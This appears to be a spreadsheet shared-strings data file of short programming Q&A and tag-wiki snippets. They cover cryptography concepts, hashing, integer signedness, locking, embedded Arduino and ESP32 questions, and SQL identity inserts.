  <si>
    <t>A futex (short for "fast userspace mutex") is a Linux construct that can be used to implement basic locking, or as a building block for higher-level locking abstractions such as semaphores and POSIX mutexes or condition variables.</t>
  </si>
  <si>
    <t>Your three cases apply these rules as follows:
Unsigned char 0xaa is promoted to unsigned int 0x00aa and unsigned char 0x55 to unsigned int 0x0055.</t>
  </si>
  <si>
    <t>An AVR implementation of that is:
This works for signed or unsigned interpretation of the bits, since all we're doing is discarding the low bit from the 9-bit full result of the addition.</t>
  </si>
  <si>
    <t>Bitwise XOR operation on the seed
Bitwise Shift and/or Rotation on the seed
AES Encryption/Decryption of the seed (symmetric)
RSA Encryption/Decryption of the seed (asymmetric)
Combinations of these
If you asked this question to find out how the SecurityAccess on a particular ECU works, there is no way to know without the ECU specification or lots of reverse-engineering.</t>
  </si>
  <si>
    <t>The EVP cipher routines are a high level interface to certain symmetric ciphers.</t>
  </si>
  <si>
    <t>Amongst other things, the Birthday Paradox affects cryptography, hashing and various applications of random number generators.</t>
  </si>
  <si>
    <t>Rainbow tables can be invalidated by the use of a salt, which increases the key size by appending random data.</t>
  </si>
  <si>
    <t>The cipher uses a default 128-bit block size, with varying key sizes of 128, 192 and 256 bits.</t>
  </si>
  <si>
    <t>Amongst other things the phenomenon affects hashing, cryptography and various applications of random number generators.</t>
  </si>
  <si>
    <t>A cryptographically strong random number minimally complies with the statistical random number generator tests specified in FIPS 140-2, Security Requirements for Cryptographic Modules, section 4.9.1.</t>
  </si>
  <si>
    <t>The application designer defines the set of low-level operations that are considered security sensitive and then defines a set of tasks that map onto those operations.</t>
  </si>
  <si>
    <t>Murmurhash generates roughly the same number of collisions as alternate hashes over a wide range of input data.</t>
  </si>
  <si>
    <t>I tried the way described in here, but I just get an error:
invalid conversion from 'byte* {aka unsigned char*}' to 'uint8_t {aka
  unsigned char}' [-fpermissive]
I need to get the actual connected router/access point to find the position of the esp32 in different rooms.</t>
  </si>
  <si>
    <t>You could either convert the values to unsigned 8-bit (by truncation and) or to 16-bit signed with a shift and subtraction.</t>
  </si>
  <si>
    <t>Deterministic encryption must use a column collation with a binary2 sort order for character column
Randomized Encryption
Randomized encryption uses a method that encrypts data in a less predictable manner.</t>
  </si>
  <si>
    <t>The formats of supported HID reports are described in the Bluetooth Data Module Command Reference &amp; Advanced Information User's Guide:
http://ww1.microchip.com/downloads/en/DeviceDoc/bluetooth_cr_UG-v1.0r.pdf
Section 5.3.3 describes the raw report format for joystick data:
Byte 0: 0xFD (indicates raw HID report to follow)
Byte 1: 0x06 (report length)
Byte 2: State for buttons 0-7
Byte 3: State for buttons 8-15
Byte 4: Axis X1
Byte 5: Axis Y1
Byte 6: Axis X2
Byte 7: Axis Y2
Your currentState method is writing:
Byte 0: 0xFD (good)
Byte 1: 0x06 (good)
Byte 2: x1 &amp; 0xFF (should be Buttons 0-7)
Byte 3: y1 &amp; 0xFF (should be Buttons 8-15)
Byte 4: x2 &amp; 0xFF (should be Axis X1)
Byte 5: y2 &amp; 0xFF (should be Axis Y1)
Byte 6: btnState &amp; 0xFF (should be Axis X2)
Byte 7: (btnState &gt;&gt; 8) &amp; 0xFF (should be Axis Y2)
I think it will work if you rearrange the method to write the button state before the axis state.</t>
  </si>
  <si>
    <t>The raw RSA operation is a mathematically simple operation: exponentiation modulo n.  The exponent is the private exponent for encryption and signature, and the public exponent for decryption and verification.</t>
  </si>
  <si>
    <t>successive button presses at a very high resolution, and use a few least significant bits as entropy to mix into the pseudorandom number generator state.</t>
  </si>
  <si>
    <t>The sector trailer contains the access keys (key A on bytes 0..5, key B on bytes 10..15) and access conditions (access bits on bytes 6..8) for a sector.</t>
  </si>
  <si>
    <t>Atomicity is commonly enforced by mutual exclusion, whether at the hardware level building on a cache coherency protocol, or the software level using semaphores or locks.</t>
  </si>
  <si>
    <t>Overflowing a signed integer is undefined behavior in c, because different implementations could use different representations for negative numbers.</t>
  </si>
  <si>
    <t>xxHash is an extremely fast Hash algorithm, working at speeds close to RAM limits.</t>
  </si>
  <si>
    <t>The jarsigner tool is used for two purposes:
to sign Java ARchive (JAR) files, and
to verify the signatures and integrity of signed JAR files.</t>
  </si>
  <si>
    <t>jarsigner can verify the digital signature of the signed JAR file using the certificate inside it (in its signature block file).</t>
  </si>
  <si>
    <t>A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes.</t>
  </si>
  <si>
    <t>Lock Objects: used to manage parallel access to a table by locking and unlocking table access.</t>
  </si>
  <si>
    <t>locking, unlocking, and polling for locks), and decouples event and thread scheduling from application logic.</t>
  </si>
  <si>
    <t>All signed arithmetic on all architectures that are supported by GCC use 2's complement; and additionally GCC does not consider the behaviour &lt;&lt; on signed numbers as undefined in the cases where the sign bit is changed.</t>
  </si>
  <si>
    <t>The C standard defines an int as being a signed type large enough to at least hold all integers between -32768 and 32767 - implementations are free to choose larger types, and any modern 32-bit system will choose a 32-bit integer.</t>
  </si>
  <si>
    <t>Based on this
c.enter_data("24.3")
post = {"auth": data, ... # No conversion done internally
You are actually inserting a string, not a float
You should be able to insert floats with 
To debug further I suggest:
Trying the commands on the mongo command line client, to confirm floating point behavior
When you insert in the CLI or your Python code, get a hold of the ID of the inserted object, to make sure you are looking at the right object</t>
  </si>
  <si>
    <t>Double-checked locking  is a software design pattern used to reduce the overhead of acquiring a lock by first testing the locking criterion  without actually acquiring the lock.</t>
  </si>
  <si>
    <t>Resources
Introducing Drupal.behaviors
Drupal.behaviors: The Two Step Secret To Unlocking Drupal's Javascript
Drupal.behaviors and Drupal-specific JavaScript (Requires subscription.)</t>
  </si>
  <si>
    <t>It is still better to protect such table as much as possible as (assuming the hashing algorithm is known) the attacker can use it with his own program to probe a big number of potential passwords in a short time.</t>
  </si>
  <si>
    <t>I probably would have preferred an unsigned  type, using a type like shorter as the signed variant :-)
In any case, that means that getting a value greater than 127 from your comms channel is going to look like a negative number to Java.</t>
  </si>
  <si>
    <t>The secret key can be used both to encrypt and decrypt the information, in which case only the owners of the secret key can communicate to each other; or it can be used in association with a public-key, in which case anyone can encrypt data that can then be read only by the owners of the secret key.</t>
  </si>
  <si>
    <t>The  type is distinct from both signed char and unsigned char, and it's implemented-defined whether plain char can have negative values (and if so, which).</t>
  </si>
  <si>
    <t>NaCl (pronounced "salt") is a high-speed software library for network communication, encryption, decryption, signatures, and more.</t>
  </si>
  <si>
    <t>Note that symmetric encryption does not require that the encryption and decryption key be identical, but rather that both keys derive from the same knowledge.</t>
  </si>
  <si>
    <t>It consists of:
A JOSE Header (the union of the JWS Protected Header and the JWS Unprotected Header), describing the digital signature or MAC used to generate the signature
A JWS Payload, which is the content to be transmitted
A JWS Signature
The JWS Signature can be used by the recipient of the JWS to verify the integrity of the JWS Protected Header, JWS Payload and JWS Signature.</t>
  </si>
  <si>
    <t>In asymmetric encryption, also known as public key encryption, the encryption and decryption keys are different.</t>
  </si>
  <si>
    <t>A lot of your hashing code is just and example of two different options of hashing an array of bytes and comparing it to a known hash.</t>
  </si>
  <si>
    <t>(RSA 2048 Bit encryption for Public Key and Session Key is AES 128 Bit with 64 Bytes of data) 
The sensor reads the Public key and uses it to encrypt the Random Session Key and writes it to a Write Characteristic
The peripheral device uses the random session key and finally sets the data on a read characteristic.</t>
  </si>
  <si>
    <t>So I wanted to check if I have a byte and I try to shift it and store it to an int, what values do I get, and I want to test if somehow I can store signed byte values inside a byte array.</t>
  </si>
  <si>
    <t>Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted since it was signed by use of a cryptographic hash.</t>
  </si>
  <si>
    <t>Since this is a signed value and it has its high bit set, it's negative (specifically, -32768), and sign-extending it to a uint32_t gives 0xffff8000.</t>
  </si>
  <si>
    <t>A database sequence is a number generator that produces unique numbers in a scalable and concurrency safe way.</t>
  </si>
  <si>
    <t>Homomorphic Encryption
Homomorphic encryption refers to a new type of encryption scheme that allows computations to be directly on encrypted data without requiring decryption first.</t>
  </si>
  <si>
    <t>An example of digitally signing a simple message in java then verifying the result:
See also:
wikipedia topic on digital signatures
cryptography
xml-signature</t>
  </si>
  <si>
    <t>Most modern crypt(3) implementations include various alternative hashing algorithms, which typically support arbitrarily long passphrases, longer salts and adjustable iteration counts to deliberately slow down the digest calculation for key stretching.</t>
  </si>
  <si>
    <t>Note that  in Java and C# differ for 2 main reasons:
Java byte type is signed, while the C# byte type is unsigned (if you need signed use sbyte type)
Java stores byte as Big Endian, while C# uses Little Endian by default
Since java doesn't include unsigned byte in the language, you can print a conversion to int in the following way:</t>
  </si>
  <si>
    <t>Application-level encryption moves the encryption/decryption process to the
applications that generate the data.</t>
  </si>
  <si>
    <t>This type of lock is useful if you want to allow multiple threads to have simultaneous read-only access, but as soon as one thread wants to write to the resource, all other threads must be blocked until the writing is complete.</t>
  </si>
  <si>
    <t>In detail, from the php src, you can see that:
is_writable() is defined at ext/standard/php_filestat.h, which uses:
php_stat header file defined at php_stat()
VCWD_ACCESS() function is used
In turn:
VCWD_ACCESS() 
is a convenience wrapper for virtual_access()
virtual_access() 
is thread safe wrapper around the access() function that takes
  per-thread virtual working directories into account.</t>
  </si>
  <si>
    <t>Usage
Simply define your audit definitions at any time before calling SubmitChanges();
Limitations
Any tables you want to audit must have one (and only one) Primary Key field, which is of type "int"
Depending on demand for this feature I will begin exploring ways around this, including GUID primary keys and composite keys.</t>
  </si>
  <si>
    <t>RSA, Diffie-Hellman (DH), El-Gamal (ElG), and elliptic curve variants of DH and ElG are examples of public key encryption algorithms.</t>
  </si>
  <si>
    <t>Memory, peripherals, BUS and CPU are made aware of the world via the 'NS' bit which allows the SOC to provide access control to secrets and code on the system.</t>
  </si>
  <si>
    <t>A cryptographic hash function is a function that takes a string of bytes of variable length for input and returns a fixed number of bytes (the exact number depending on the function) such that:
It is extremely difficult to find an input given an output.</t>
  </si>
  <si>
    <t>The software performs a batch of 64 separate signature verifications (verifying 64 signatures of 64 messages under 64 public keys) in only 8.55 million cycles, i.e., under 134000 cycles per signature.</t>
  </si>
  <si>
    <t>You can send a signal to user space thread from kernel API, which can help u run non-blocking:
But there is a limitation: u need to be aware of pid of user thread in Kernel.</t>
  </si>
  <si>
    <t>A JavaScript API for performing basic cryptographic operations in web applications, such as hashing, signature generation and verification, and encryption and decryption.</t>
  </si>
  <si>
    <t>JavaScript API for performing basic cryptographic operations in web applications, such as hashing, signature generation and verification, and encryption and decryption.</t>
  </si>
  <si>
    <t>A numpy array can be of any type integer, float, double or even signed and unsigned.</t>
  </si>
  <si>
    <t>Example:
Under normal conditions, with IDENTITY_INSERT off, values for the identity column cannot be manually specified:
SET IDENTITY_INSERT MyTable OFF; -- Which is the Default
insert into MyTable(name) values ('Andrew');
-- 1 row(s) affected
insert into MyTable(id, name) values (5, 'Andrew');
-- Cannot insert explicit value for identity column in table 'MyTable' when IDENTITY_INSERT is set to OFF.</t>
  </si>
  <si>
    <t>This lock assumes that some resource can be unlocked (ready to lock before working with it), locked read only (multiple threads can access but none can modify) or locked read/write (only one thread can access and modify).</t>
  </si>
  <si>
    <t>If you are looking to securely hash values, consider something stronger like bcrypt
MD5 (Message-Digest algorithm 5) is a widely used cryptographic hash function with a 128-bit (16-byte) hash value.</t>
  </si>
  <si>
    <t>Example of report from BenchmarkDotNet, comparing performance of two alternative algorithms (in this case cryptographic hash sums) -- MD5 and SHA5:</t>
  </si>
  <si>
    <t>Unix Millennium Bug, affects systems that use a signed 32-bit integer for the number of seconds since the "unix epoch" or 00:00:00 January 1, 1970.</t>
  </si>
  <si>
    <t>I have added a variable  to the SMSGSM (and CallGSM) class:
sms.cpp:
                     // phone numbers are identical
                     // authorization is OK
                     // ---------------------------
+                    last_authorized = i;
                     ret_val = GETSMS_AUTH_SMS;
                     break;  // and finish authorization
                 }
sms.h:
      char GetAuthorizedSMS(byte position, char *phone_number, char *SMS_text, byte max_SMS_len,
                           byte first_authorized_pos, byte last_authorized_pos);
     char DeleteSMS(byte position);
+    // set by CallStatusWithAuth
+    byte last_authorized;
};
and read that variable from my SMSGSM instance.</t>
  </si>
  <si>
    <t>4A cast will always preserve the input value if the value fits in the target type, so casting a signed type to a wider signed type will be done by a sign-extension, and casting an unsigned type to a wider type will be done by a zero-extension</t>
  </si>
  <si>
    <t>The Communication configuration:
Baud-rate = 115200,
No Parity bit,
One StopBit,
No Handshake,
Frame Length : 16 bytes
Is it worth adding a checksum in my application?</t>
  </si>
  <si>
    <t>Assuming you have defined an encryption scheme, PHP has Mcrypt functions Defuse that support symmetric chipers, OpenSSL functions that support asymmetric chipers and Hash functions.</t>
  </si>
  <si>
    <t>Atomics can even be used to build custom locking primitives (but that's usually a bad idea on systems with OS-supported locking functions that yield the CPU on contention).</t>
  </si>
  <si>
    <t>This includes operations such as parsing and optimizing queries, as well as table handling operations (opening, locking, unlocking, closing).</t>
  </si>
  <si>
    <t>Indeed,
unless using specific encryption algorithms or mode of operation (e.g., order
preserving encryption, ECB mode of operation preserving equality, see below),
indexing encrypted data is useless.</t>
  </si>
  <si>
    <t>There are sanitizers to detect many issues, including many C and C++ "undefined behaviors", signed integer arithmetic overflow, memory allocation errors, use of uninitialized memory, and data races between threads.</t>
  </si>
  <si>
    <t>This specification describes a JavaScript API for performing basic cryptographic operations in web applications, such as hashing, signature generation and verification, and encryption and decryption.</t>
  </si>
  <si>
    <t>This system has a 2^128 security target; breaking it has similar difficulty to breaking NIST P-256, RSA with ~3000-bit keys, strong 128-bit block ciphers, etc.</t>
  </si>
  <si>
    <t>I want to produce verifications to a true random number generator (TRNG) numbers generated by specific hardware, but I'm not used to this.</t>
  </si>
  <si>
    <t>The necessity for lock-free software architectures arises mainly from performance and scalability issues with using locks for synchronization: Using a lock requires a writer to exclude all readers, but very fine-grained locking (per hash bucket for example) takes extra storage and more lock/unlock overhead.</t>
  </si>
  <si>
    <t>Cryptographic hash function with a 128-bit (16-byte) hash value.</t>
  </si>
  <si>
    <t>Hashes are used in cryptography, lookup tables, passwords, as checksums, data validation, data comparison, and many other uses.</t>
  </si>
  <si>
    <t>In particular, cryptographic transformations intended to be one way, such as cryptographic hash algorithms (e.g.</t>
  </si>
  <si>
    <t>Transforms - Contains various transformations that are to be performed on the data to be signed before calculating the digest.</t>
  </si>
  <si>
    <t>std::numeric_limits is a C++ standard library class that contains traits and information about the built-in numeric types, such as the maximum and minimum representable values, number of digits, and whether the it is a signed type.</t>
  </si>
  <si>
    <t>In a public-key encryption system, any person can encrypt a message using the public key of the receiver, but such a message can be decrypted only with the receiver's private key.</t>
  </si>
  <si>
    <t>My application is an Arduino library that needs statistically random numbers that do not need to have any cryptographic strength at all, but cannot just repeat the same cycle over and over again.</t>
  </si>
  <si>
    <t>It can represent values from 0 to 255.
int16_t is a signed 16 bit integer.</t>
  </si>
  <si>
    <t>Digital signatures are often used in a cryptographically secure message exchange to provide: 
Authentication - proof that a message was sent from a trusted party
Integrity - proof that a message was not tampered with in transit
Non-repudiation - the receiver can proof to a third party that the message originated from the original sender
Message authentication codes (MAC) also offer authentication and integrity protection, but no non-repudiation.</t>
  </si>
  <si>
    <t>and   if   i  want  to detect  the  type of the  chip on   avrdudess  is  it necessary  to write  the  lock byte  and  HIGH fuses  and low fuses  or  just   i need  to  predict  only  the lock byte?</t>
  </si>
  <si>
    <t>seems you're near the RAM limits...
or your m exceeds the binaryFrame limits...
By quickly looking, I estimate m being about half of k, and you defined
and if there's no 0x0D, you won't reset m ...
With local variables you get a different behavior when spoofing memory.</t>
  </si>
  <si>
    <t>and if i want to detect the type of the chip on avrdudess is it necessary to write the lock byte and HIGH fuses and low fuses or just i need to predict only the lock byte?</t>
  </si>
  <si>
    <t>In terms of granularity and key management, application-level encryption offers the highest flexibility since the encryption granularity and the encryption keys can be chosen depending on
application logic.</t>
  </si>
  <si>
    <t>The first idea for me when looking at the code is that you were wrong when declaring the array containing the ciphertext:
byte enciphered[length];
obviously that's not correct if the ciphertext size expands the plaintext size due to padding.</t>
  </si>
  <si>
    <t>That aside, you cant directly store an int value (2 bytes, signed) in an uint8_t (1 byte, unsigned).</t>
  </si>
  <si>
    <t>For instance, symmetric encryption is about transforming some data (possibly a huge file), using a (normally short) key, into an encrypted form which shows no readable structure anymore, but such that the transformation can be reversed (recovering the original data from the encrypted form) if the encryption key is known.</t>
  </si>
  <si>
    <t>This is an unsigned number while java only deals with signed numbers.</t>
  </si>
  <si>
    <t>That is why only 64 GByte (=block size * counter size) of data can be securely encrypted in case of AES.</t>
  </si>
  <si>
    <t>For cryptographic applications, a deterministic cryptographic hash function is used; usually hash collision resistance is of paramount importance.</t>
  </si>
  <si>
    <t>This might be as simple as shifting each letter by a number of places in the alphabet (known as the Caesar Cipher), or as complicated as the Advanced Encryption Standard, which is used in some modern cryptography.</t>
  </si>
  <si>
    <t>The higher the isolation level is, the more is guaranteed that another transaction can't break yours, but the lower amount of concurrency the database can handle.</t>
  </si>
  <si>
    <t>https://www.arduino.cc/en/Reference/UnsignedInt
On the Uno and other ATMEGA based boards, unsigned ints (unsigned
  integers) are the same as ints in that they store a 2 byte value.</t>
  </si>
  <si>
    <t>Root CA and Signing CA have 384 bit keys (ECC - secp384r1 curve) rather than 256 bit (prime256v1 curve).</t>
  </si>
  <si>
    <t>Some connections will require that a 7-bit byte with a parity are used, rather than an 8-bit byte.</t>
  </si>
  <si>
    <t>Note that I'm assuming you want to write an encryption scheme, not encryption primitives.</t>
  </si>
  <si>
    <t>Is it (easily) possible to calculate the XTEA key if the attacker knows raw bytes and the encryptes ones?</t>
  </si>
  <si>
    <t>A digital signature is a mathematical scheme for demonstrating the authenticity of a digital message or document.</t>
  </si>
  <si>
    <t>Cryptography covers, among other things, encryption, hashing and digital signatures.</t>
  </si>
  <si>
    <t>BCrypt is an implementation of the Blowfish cipher and a computationally-expensive hash function mostly used for password hashing.</t>
  </si>
  <si>
    <t>Shifting left by n bits on a signed or unsigned binary number has the effect of multiplying it by 2n.</t>
  </si>
  <si>
    <t>Identical plaintext blocks are encrypted into identical ciphertext blocks, which makes it easy for an attacker to circumvent its security.</t>
  </si>
  <si>
    <t>With quality of service level 2, a more sophisticated handshaking and acknowledgment sequence is used than for level 1 to ensure that messages are not duplicated
MQTT keep alive interval
The MQTT keep alive interval, which is measured in seconds, defines the maximum time that can pass without communication between the client and broker.</t>
  </si>
  <si>
    <t>My idea was the following:
Board B asks Board A to switch the relay
Board A sends some random bytes as a challenge
Board B encrypts these raw bytes with XTEA algorithm and returns the value to Board A
Board A deciphers the response from Board B and compares it with its own result.</t>
  </si>
  <si>
    <t>Since we're using CTR mode, we don't need to have a separate "decrypt" function; We can just call the encrypt function once to encrypt then call the same function one more time and it should decrypt.</t>
  </si>
  <si>
    <t>NTRUSign is digital signature algorithm based on lattices which is assumed to be quantum computer secure in contrast to RSA and ECC.</t>
  </si>
  <si>
    <t>References
RFC 5297:  Synthetic Initialization Vector (SIV) Authenticated Encryption Using the Advanced Encryption Standard (AES)
Philip Rogaway and Thomas Shrimpton, The SIV Mode of Operation for
Deterministic Authenticated-Encryption (Key Wrap) and Misuse-Resistant Nonce-Based Authenticated-Encryption</t>
  </si>
  <si>
    <t>Main approaches to thread safety include re-entrancy, thread-local storage, mutual exclusion (locking), atomic operations and immutable objects .</t>
  </si>
  <si>
    <t>Also, security context tokens are based on a symmetric key, which makes them inherently more efficient at digitally signing or encrypting a SOAP message than an asymmetric key.</t>
  </si>
  <si>
    <t>I doubt it is a mistake but I can't really understand the reasoning behind this part in
int mbedtls_gcm_setkey( mbedtls_gcm_context *ctx,
                    mbedtls_cipher_id_t cipher,
                    const unsigned char *key,
                    unsigned int keybits )
{
    int ret;
    const mbedtls_cipher_info_t *cipher_info;
    cipher_info = mbedtls_cipher_info_from_values( cipher, keybits, MBEDTLS_MODE_ECB );
    ... 
}
found here.</t>
  </si>
  <si>
    <t>A valid digital signature gives a recipient reason to believe that the message was created by a known sender, such that the sender cannot deny having sent the message (authentication and non-repudiation) and that the message was not altered in transit (integrity).</t>
  </si>
  <si>
    <t>Hence, long story short: your passphrase is standard-wise technically invalid, and you're looking for undefined behavior.</t>
  </si>
  <si>
    <t>Galois/Counter mode of the Advanced Encryption Standard: A mode of operation of the AES block cipher which both encrypts and authenticates its input data.</t>
  </si>
  <si>
    <t>fingerprint_t struct is like this:
typedef struct _fingerprint_t
{
    uint16_t finger_id;
    uint16_t confidence;
    uint16_t template_count;
    uint32_t password;
    uint32_t address;
    uint32_t fd;
} fingerprint_t;
I allocate memory for fp in fingerprint_init like this:
fingerprint_t *fp = (fingerprint_t *) malloc(sizeof(fingerprint_t));
I only initialize password, address and fd inside fingerprint_init.</t>
  </si>
  <si>
    <t>Row locking avoids collisions and deadlocking much more readily by locking only rows that are being edited.</t>
  </si>
  <si>
    <t>Another example would be optimizing n % 4 to n &amp; 3 (for unsigned n, or to a more elaborate sequence for signed n), because hardware division instructions are still very expensive.</t>
  </si>
  <si>
    <t>Negative zero does not exist in the common two's complement representation for signed integers.</t>
  </si>
  <si>
    <t>As I've mentioned in other posts, I personally do not trust the built-in pseudorandom number generators, and instead implement one of the known linear feedback shift generator based ones (a Xorshift variant, or Mersenne Twister).</t>
  </si>
  <si>
    <t>By enabling IDENTITY_INSERT, values for id MUST be provided
SET IDENTITY_INSERT MyTable ON;
insert into MyTable(id, name) values (6, 'Charles');
-- 1 row(s) affected
insert into MyTable(name) values ('Dan');
-- Explicit value must be specified for identity column in table 'MyTable' either when IDENTITY_INSERT is set to ON or when a replication user is inserting into a NOT FOR REPLICATION identity column.</t>
  </si>
  <si>
    <t>In a Hash Table, the Birthday Paradox makes the likelihood of collisions quite high unless you have a perfect hash function that hashes a controlled set of source values to a unique set of hash values.</t>
  </si>
  <si>
    <t>Using universal hashing (in a randomized algorithm or data structure) refers to selecting a hash function at random from a family of hash functions with a certain mathematical property (see definition below).</t>
  </si>
  <si>
    <t>Cryptography calls such knowledge as a secret or key: this is a piece of secret data, which is used as parameter to a cryptographic algorithm that implements a cryptographic property with regards to the key.</t>
  </si>
  <si>
    <t>this will take your 24-bit twos-complement value in a uint32_t and convert it to a (signed) int32_t.</t>
  </si>
  <si>
    <t>Universal hashing has numerous uses in computer science, for example in implementations of hash tables, randomized algorithms, and cryptography.</t>
  </si>
  <si>
    <t>to clarify: the question is about the feasibility of using microcontroller-gathered data to generate random numbers that could be applied soundly to cryptography-- an alternative to relying on a device's entropy.</t>
  </si>
  <si>
    <t>It is important to note that public key encryption is mostly called asymmetric encryption because it uses two keys instead of one key as opposed to symmetric encryption.</t>
  </si>
  <si>
    <t>This leakage of information becomes apparent when two identical plain text blocks are encrypted; the resulting cipher text will be identical.</t>
  </si>
  <si>
    <t>So, in the serial monitor it is showing 16 bytes of encrypted data + 112 bytes of plaintext data.</t>
  </si>
  <si>
    <t>My questions to you:
Is it (easily) possible to calculate the XTEA key if the attacker knows raw bytes and the encryptes ones?</t>
  </si>
  <si>
    <t>Usigned and signed integer values (of the same size) are represented by the same bit patterns, the only difference lies in their interpretation.</t>
  </si>
  <si>
    <t>There is no such thing as a signed or unsigned byte when you reduce it to the pure binary representation.</t>
  </si>
  <si>
    <t>Here is what I did to make bit 16 the signed bit in my python code
outputs:
Seems to work with the entire range from -32768 to 32768</t>
  </si>
  <si>
    <t>The problem comes when char is unsigned, because then when getchar returns EOF (the value -1) the unsigned char value will be equal to 255 (the unsigned decimal representation of 0xff).</t>
  </si>
  <si>
    <t>A nonce, short for  number used once, is a random number used to sign a message in client-server communication.</t>
  </si>
  <si>
    <t>A very simple cipher in which the letters of the alphabet are substituted by a different letter that have a fixed distance to the original letter.</t>
  </si>
  <si>
    <t>at MIT, is a special kind of hashing such that when a hash table is resized only K/n keys need to be remapped unlike normal hashing techniques</t>
  </si>
  <si>
    <t>These spoofed signals, however, are modified in such a way as to cause the receiver to determine its position to be somewhere other than where it actually is, specifically somewhere determined by the attacker.</t>
  </si>
  <si>
    <t>ecn is encryption method
0: OPEN
2: WPA_PSK
3: WPA2_PSK
4: WPA_WPA2_PSK
maxconn defines maximum number of Stations to which ESP8266 SoftAP can be connected within the range of [1, 10]
ssidhidden defines if the ssid is broadcasted 
0: Broadcasted
1: Hidden</t>
  </si>
  <si>
    <t>encryption is the process of transforming information (referred to as plaintext) using an algorithm (called cipher) to make it unreadable to anyone except those possessing special knowledge, usually referred to as a key.</t>
  </si>
  <si>
    <t>By creating a cryptographic signature for such a manifest file, the entire contents of the distribution package can be validated, as altering any of the files will invalidate the checksums in the manifest file.</t>
  </si>
  <si>
    <t>Besides several crypt password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.</t>
  </si>
  <si>
    <t>It appears in your case that UNO uses signed chars, but the Due uses unsigned chars.</t>
  </si>
  <si>
    <t>And if you cast 0xFF to signed char like this
uint32_t b = (signed char)0xFF;
uint32_t c = b &lt;&lt; 8;
then upon promoting to int it'll be sign-extended to 0xFFFF.</t>
  </si>
  <si>
    <t>Unlike its counterpart int32 which is signed, uint32 can only be used to store positive integers, of values between 0 and  232 - 1.</t>
  </si>
  <si>
    <t>It provides a high-level interface so strong security capabilities can be added to an application without needing to know many of the low-level details of encryption or authentication algorithms.</t>
  </si>
  <si>
    <t>The result of such encrypted computations remains encrypted and can thus only be interpreted the owner of a secret key (in most cases the data owner).</t>
  </si>
  <si>
    <t>Encryption is the process of transforming information (called plaintext) into an unreadable form (called ciphertext) using an encryption algorithm combined with a parameter (called an encryption key).</t>
  </si>
  <si>
    <t>The sector trailer stores the access keys (key A in the first 6 bytes, key B in the last 6 bytes) and the access conditions (byte 6-8) for that sector.</t>
  </si>
  <si>
    <t>The  function uses the key stream generator employed by the arc4 cipher, which uses 8*8 8 bit S-Boxes.</t>
  </si>
  <si>
    <t>In Yii2, Faker can generate random strings (like name, address, phone number or anything), random numbers, keys or harshes as well as long sentences of fake text.</t>
  </si>
  <si>
    <t>In public-key cryptography, authentication can be performed with signatures: generating the signature of a message requires the private key, but the signature can be verified with just the public key.</t>
  </si>
  <si>
    <t>Cryptography covers the science of designing cryptographic algorithms (cryptology) and of trying to break them (cryptanalysis); it also encompasses the techniques used to apply the algorithms in various situations, in particular implementation as software, and the related subjects (such as performance issues).</t>
  </si>
  <si>
    <t>For technical reasons, an encryption scheme usually uses a pseudo-random encryption key generated by an algorithm.</t>
  </si>
  <si>
    <t>In many modern cryptosystems, public-key cryptography is used to establish
a secret key, and the faster symmetric key crypto is used to actually encrypt and decrypt data.</t>
  </si>
  <si>
    <t>use a shared secret, send a random nonce plus the nonce hashed with the shared secret to the server, the server checks the hash, and replies with the answer, the nonce, plus the answer hashed with the shared secret and the nonce, each of which the client then checks).</t>
  </si>
  <si>
    <t>The two least significant bits of the 1st byte of the MAC address that are important - what I think of as the 7th and 8th bit:
where  represents any bit in the mac address, and X is the "U/L bit" and Y is the Uni/multi cast bit
If the the eighth bit of a MAC address is 1, devices may have trouble getting IP addresses using DHCP.</t>
  </si>
  <si>
    <t>What I did is, instead of encrypting both the data and the signature together, I've decided to just encrypt the data and appended the signature to the end of the data along with something that I can use to delimit with (ie.</t>
  </si>
  <si>
    <t>When you define a variable as in integer on the arduino it defaults to 16-bit signed integer value.</t>
  </si>
  <si>
    <t>Divides IP address into network id (high bits) and host id (low bits) as determined by netmask.</t>
  </si>
  <si>
    <t>When the number is input to the computer, the validation program carries out a calculation similar to that used to generate the check digit originally and thus checks its validity.</t>
  </si>
  <si>
    <t>For a signed char, when -1 is converted to an int, it keeps the value -1 (which will be represented as 0xffffffff for a 32-bit int type).</t>
  </si>
  <si>
    <t>The access conditions are protected by a redundancy mechanism where each access bit is present multiple times in positive and negative logic.</t>
  </si>
  <si>
    <t>In cryptography, encryption is the process of transforming information (called plaintext) into an unreadable form (called ciphertext) using an encryption algorithm combined with a parameter called an encryption key.</t>
  </si>
  <si>
    <t>As a special kind of PRNG, cryptographic cipher functions can be used, where entropy is used to initialize and update the cipher's key.</t>
  </si>
  <si>
    <t>The solution is still blocking in a manner but, UDP packets wont be blocked by player until ABQ size increases as its capacity.</t>
  </si>
  <si>
    <t>Also, you may want to have one lock for the List&lt;Object&gt; and a separate lock for each item in the list, depending on how your thread use those devices.</t>
  </si>
  <si>
    <t>Double hashing is a collision resolution strategy used in open addressing hash tables.</t>
  </si>
  <si>
    <t>The key
derivation function (KDF) is intended to support a wide range of
applications and requirements, and is conservative in its use of
cryptographic hash functions.</t>
  </si>
  <si>
    <t>Negative zero is a value that occurs in several representations of signed numbers, including IEEE 754 floating point formats.</t>
  </si>
  <si>
    <t>A homoglyph is one of several graphemes, characters, or glyphs that cannot be easily visually differentiated  for example:
 (U+0030 DIGIT ZERO)
O (U+004F LATIN CAPITAL LETTER O)
1 (U+0031 DIGIT ONE)
l (U+006C LATIN SMALL LETTER L)
Confusion between homoglyphs can give rise to security concerns.</t>
  </si>
  <si>
    <t>StrictMode is most commonly used to catch accidental disk or network access on the application's main thread, where UI operations are received and animations take place.</t>
  </si>
  <si>
    <t>Further details:
Difference between Hashing a Password and Encrypting it
Cryptographic hash function
Password Hashing Competition</t>
  </si>
  <si>
    <t>Support for libproxy
 Support for TLS PSK ciphersuites
 Support for elliptic curve certificates
 Ability to select specific curves when using elliptic curve ciphersuites.</t>
  </si>
  <si>
    <t>StrictMode is most commonly used to catch accidental disk or network
  access on the application's main thread, where UI operations are
  received and animations take place.</t>
  </si>
  <si>
    <t>The values returned by a hash function are called hash values, hashcodes, hash sums, checksums or simply hashes.</t>
  </si>
  <si>
    <t>The result of this operation quickly removes all data from a table, typically bypassing a number of integrity enforcing mechanisms.</t>
  </si>
  <si>
    <t>Encryption is the process of transforming information (referred to as plaintext) using an algorithm (called cipher) to make it unreadable to anyone except those possessing special knowledge, usually referred to as a key.</t>
  </si>
